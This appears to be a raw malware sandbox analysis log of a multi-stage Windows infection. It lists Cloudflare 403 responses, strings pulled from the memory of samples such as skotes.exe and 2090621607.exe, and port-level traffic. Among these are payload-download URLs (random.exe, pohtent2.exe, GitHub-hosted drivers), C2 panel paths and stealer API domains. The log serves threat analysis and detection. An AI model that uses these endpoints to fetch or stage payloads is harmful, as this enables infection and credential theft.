NID=518=hx4NEOILpI80dBbgrrGm129tv0HDtsaX_FhoqZ-zD6BREcbkIVxvppaPAYGiTpY--TS0F0o3FbdxHHxs3gzlCnHln9xLDu9L6Yk05bBHfAmNa_v5zrN0y8ofjRA7GUq-F-9_Qu3PrY4ACol0CWWW1Ok71RVqJ2q-ICtiEzq5KefXSrYUsjB3kxK6IvCRB1N5Zn4

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 07 Nov 2024 06:33:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T%2BGHyc2DD%2FTOj3TV0vZtMvbQMccPd7AydLfkpEJ2ffwmhqQ4X2bwWtQb1y6Ss7CV81MaMsLdSWU4PorzHuaHsbRXUTf9a243y2wcp1FQkegQghJEbRY%2FRJbc4g9V1bVYD5Q%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8deb4b292f856c6c-DFW
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 07 Nov 2024 06:34:06 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FiaCavKbf7x21%2BWCigo7yYlmVb5UvJyQp1WuiQx57h4FTi8278IVthTokMnoa52DDCgSMT%2FAOYLU%2BYqNMYg33v9m%2FsSZhf3%2FQxePnGVZr8sKS3U6iEVJyiSKKRouXZUFlHI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8deb4bac2f3146d1-DFW
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 07 Nov 2024 06:34:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y7YZtNqwRvKNKHhN0U9ESvW9GnNSCkyl3UeRdF2dL0mPfo24LH5n9uYoTcLDhp%2BHLSKP64Fu6WBGxoUviThaLJREYc83B%2BUm3lXL2%2BejEfbB5uch6LqsxTfJVx9RxeYmWx0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8deb4bffea5345fb-DFW

Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exeM
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/luma/random.exeX
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe4c61395d7
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exe=
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exeb
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/off/random.exec61395d7f
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: 0717674af5.exe, 0000004B.00000002.2733720136.0000000000B1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206
Source: 0717674af5.exe, 0000004B.00000002.2733720136.0000000000B32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/
Source: 0717674af5.exe, 0000004B.00000002.2733720136.0000000000B78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: 0717674af5.exe, 0000004B.00000002.2733720136.0000000000B78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/
Source: 0717674af5.exe, 0000004B.00000002.2733720136.0000000000B78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/=
Source: 0717674af5.exe, 0000004B.00000002.2733720136.0000000000B78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php/u
Source: 0717674af5.exe, 0000004B.00000002.2733720136.0000000000B32000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpR
Source: 0717674af5.exe, 0000004B.00000002.2733720136.0000000000B78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/h
Source: 0717674af5.exe, 0000004B.00000002.2733720136.0000000000B78000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.206/ws
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3059247457.0000000000E8B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php4
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php4553001
Source: skotes.exe, 00000006.00000002.3059247457.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpM
Source: skotes.exe, 00000006.00000002.3059247457.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpY
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpded
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedE
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpq
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/es
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/fac00b58987e8e4f4b2846d934f48b15eaa495c49#
Source: skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/ocal
Source: InstallUtil.exe, 0000000A.00000002.3002918000.0000000001235000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: InstallUtil.exe, 0000000A.00000002.3002918000.0000000001235000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enl
Source: chromecache_192.16.dr	String found in binary or memory: http://schema.org/WebPage
Source: pohtent2.exe, 00000007.00000002.2424020147.0000000002EF4000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.00000000033A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: skotes.exe, 00000006.00000002.3059247457.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tmpfiles.org/dl/15309322/pohtent2.exe
Source: skotes.exe, 00000006.00000002.3059247457.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tmpfiles.org/dl/15309322/pohtent2.exe21
Source: skotes.exe, 00000006.00000002.3059247457.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tmpfiles.org/dl/15309322/pohtent2.exeex
Source: chromecache_193.16.dr	String found in binary or memory: http://www.broofa.com
Source: 2090621607.exe, 00000038.00000003.2842225150.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_192.16.dr	String found in binary or memory: https://apis.google.com
Source: 2090621607.exe, 00000038.00000003.2842225150.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 2090621607.exe, 00000038.00000003.2842225150.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 2090621607.exe, 00000038.00000003.2842225150.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 2090621607.exe, 00000038.00000002.3027024106.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2727318895.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2727527963.0000000000F23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store/
Source: 2090621607.exe, 0000005F.00000002.3059429528.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crisiwarny.store:443/api
Source: chromecache_193.16.dr	String found in binary or memory: https://csp.withgoogle.com/csp/lcreport/
Source: 0717674af5.exe, 0000004B.00000003.2641943936.000000000514B000.00000004.00001000.00020000.00000000.sdmp, 0717674af5.exe, 0000004B.00000002.2734723718.0000000000CBC000.00000040.00000001.01000000.00000011.sdmp, 0717674af5.exe, 00000081.00000003.2843067219.00000000056DB000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: 2090621607.exe, 00000038.00000003.2842225150.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 2090621607.exe, 00000038.00000003.2842225150.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 2090621607.exe, 00000038.00000003.2842225150.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 2090621607.exe, 0000005F.00000002.3059429528.0000000001038000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/
Source: 2090621607.exe, 00000038.00000002.3027024106.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 0000005F.00000002.3059429528.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 0000005F.00000003.2937713395.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 0000005F.00000002.3059429528.0000000001006000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/api
Source: 2090621607.exe, 00000038.00000003.2727318895.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2727527963.0000000000F23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apii
Source: 2090621607.exe, 0000005F.00000002.3059429528.0000000001006000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apis
Source: 2090621607.exe, 00000038.00000002.3027024106.0000000000F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/apistr
Source: 2090621607.exe, 00000038.00000002.3027024106.0000000000F38000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/bool
Source: 2090621607.exe, 0000005F.00000003.2937713395.0000000000FEB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/e/n
Source: 2090621607.exe, 0000005F.00000002.3059429528.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/pi
Source: 2090621607.exe, 00000038.00000003.2727318895.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store/vo
Source: 2090621607.exe, 0000005F.00000002.3059429528.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://founpiuer.store:443/api
Source: InstallUtil.exe, 0000000A.00000002.3056952575.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
Source: InstallUtil.exe, 0000000A.00000002.3056952575.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
Source: InstallUtil.exe, 0000000A.00000002.3056952575.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
Source: pohtent2.exe, 00000007.00000002.2815064831.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2718733525.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.000000000424D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: pohtent2.exe, 00000007.00000002.2815064831.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2718733525.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.000000000424D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: pohtent2.exe, 00000007.00000002.2815064831.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2718733525.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.000000000424D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: chromecache_193.16.dr	String found in binary or memory: https://lens.google.com
Source: chromecache_193.16.dr	String found in binary or memory: https://lensfrontend-pa.clients6.google.com/v1/crupload
Source: 2090621607.exe, 0000005F.00000002.3059429528.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://necklacedmny.store:443/api
Source: chromecache_192.16.dr	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chromecache_192.16.dr	String found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
Source: chromecache_192.16.dr	String found in binary or memory: https://ogs.google.com/widget/callout?eom=1
Source: chromecache_192.16.dr	String found in binary or memory: https://ogs.google.com/widget/callout?prid=19040333
Source: chromecache_193.16.dr	String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: 2090621607.exe, 0000005F.00000002.3059429528.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://presticitpo.store:443/api
Source: 2090621607.exe, 0000005F.00000002.3059429528.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://presticitpo.store:443/api;1
Source: pohtent2.exe, 00000007.00000002.2815064831.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2718733525.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.000000000424D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: pohtent2.exe, 00000007.00000002.2424020147.0000000002E42000.00000004.00000800.00020000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2815064831.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2718733525.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.000000000424D000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.00000000031D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: pohtent2.exe, 00000007.00000002.2815064831.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2718733525.0000000003E05000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2824228045.000000000424D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 0000000A.00000002.3056952575.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000048.00000002.2847739152.0000000002D32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
Source: chromecache_193.16.dr	String found in binary or memory: https://support.google.com/websearch/answer/106230
Source: 2090621607.exe, 00000038.00000003.2787979264.00000000058FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mic
Source: 2090621607.exe, 00000038.00000003.2797614085.00000000058F5000.00000004.00000800.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2787979264.00000000058FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 2090621607.exe, 00000038.00000003.2797614085.00000000058D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: 2090621607.exe, 00000038.00000003.2797614085.00000000058F5000.00000004.00000800.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2787979264.00000000058FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 2090621607.exe, 00000038.00000003.2797614085.00000000058D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: 2090621607.exe, 0000005F.00000002.3059429528.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://thumbystriw.store:443/api
Source: skotes.exe, 00000006.00000002.3059247457.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/P
Source: skotes.exe, 00000006.00000002.3059247457.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/15309322/pohtent2.exe
Source: skotes.exe, 00000006.00000002.3059247457.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/dl/15309322/pohtent2.exeV
Source: skotes.exe, 00000006.00000002.3059247457.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tmpfiles.org/t
Source: pohtent2.exe, 00000007.00000002.2424020147.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, pohtent2.exe, 00000007.00000002.2424020147.00000000031EB000.00000004.00000800.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2797614085.00000000058F5000.00000004.00000800.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2787979264.00000000058FC000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.000000000339B000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000003B.00000002.2616387171.0000000003381000.00000004.00000800.00020000.00000000.sdmp, runner.cmd.7.dr	String found in binary or memory: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103
Source: 2090621607.exe, 00000038.00000003.2797614085.00000000058D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Google
Source: chromecache_193.16.dr	String found in binary or memory: https://uberproxy-pen-redirect.corp.google.com/uberproxy/pen?url=
Source: 2090621607.exe, 00000038.00000003.2727286266.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2727318895.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2727318895.0000000000F07000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 0000005F.00000003.2937533627.0000000001006000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 0000005F.00000003.2937713395.0000000000FFD000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 0000005F.00000003.2937466911.0000000001047000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: 2090621607.exe, 0000005F.00000003.2937533627.0000000001006000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-
Source: 2090621607.exe, 00000038.00000003.2727318895.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-mana7
Source: 2090621607.exe, 00000038.00000003.2727286266.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 0000005F.00000003.2937466911.0000000001047000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: 2090621607.exe, 00000038.00000003.2842225150.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 2090621607.exe, 00000038.00000003.2787979264.00000000058FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: 2090621607.exe, 00000038.00000003.2797614085.00000000058F5000.00000004.00000800.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2787979264.00000000058FC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: 2090621607.exe, 00000038.00000003.2797614085.00000000058D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/Google
Source: chromecache_192.16.dr	String found in binary or memory: https://www.google.com/_/og/promos/
Source: 2090621607.exe, 00000038.00000003.2842225150.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_192.16.dr	String found in binary or memory: https://www.google.com/intl/en/about/products
Source: chromecache_193.16.dr	String found in binary or memory: https://www.google.com/log?format=json&hasfast=true
Source: chromecache_192.16.dr	String found in binary or memory: https://www.google.com/url?q=https://accounts.google.com/signin/v2/identifier%3Fec%3Dfutura_hpp_co_s
Source: chromecache_192.16.dr	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.ciOLm-Jy21Y.2019.O/rt=j/m=qabr
Source: chromecache_192.16.dr	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.gyN29IQRsEA.L.W.O/m=qcwid

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49983
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49858
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49857
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49977
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49975
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 50085 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49973
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49972
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49971
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
